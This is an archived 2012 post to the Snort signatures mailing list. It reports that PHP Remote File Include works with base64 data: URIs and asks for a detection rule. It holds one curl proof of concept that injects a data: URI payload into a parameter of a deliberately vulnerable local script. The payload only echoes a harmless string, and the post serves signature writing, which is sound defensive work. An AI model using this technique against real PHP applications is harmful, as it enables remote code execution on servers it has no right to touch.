Snort mailing list archives

Previous By Date Next
Previous By Thread Next

Re: PHP Remote File Include via data: URI

From: Jamie Riden <jamie.riden () gmail com>
Date: Mon, 29 Oct 2012 16:05:38 +0000
Sorry to be a PITA; anyone got this? It'll fall off my mental "todo"
list in a day or so, and that'll be it :)

On 26 October 2012 07:59, Jamie Riden <jamie.riden () gmail com> wrote:

Hi all,

Just to be a royal pain, PHP Remote File Include is perfectly viable
using base64 encoded data: URIs. PoC below:

# curl "http://127.0.0.1/vulnrfi.php?phone=data:text/plain;base64,PD9waHAgZWNobyAiV09PSE9PISIgPz4=";

..
-- 
Jamie Riden / jamie () honeynet org / jamie.riden () gmail com
http://uk.linkedin.com/in/jamieriden

------------------------------------------------------------------------------
The Windows 8 Center - In partnership with Sourceforge
Your idea - your app - 30 days.
Get started!
http://windows8center.sourceforge.net/
what-html-developers-need-to-know-about-coding-windows-8-metro-style-apps/
_______________________________________________
Snort-sigs mailing list
Snort-sigs () lists sourceforge net
https://lists.sourceforge.net/lists/listinfo/snort-sigs
http://www.snort.org


Please visit http://blog.snort.org for the latest news about Snort!
Previous By Date Next
Previous By Thread Next

Current thread: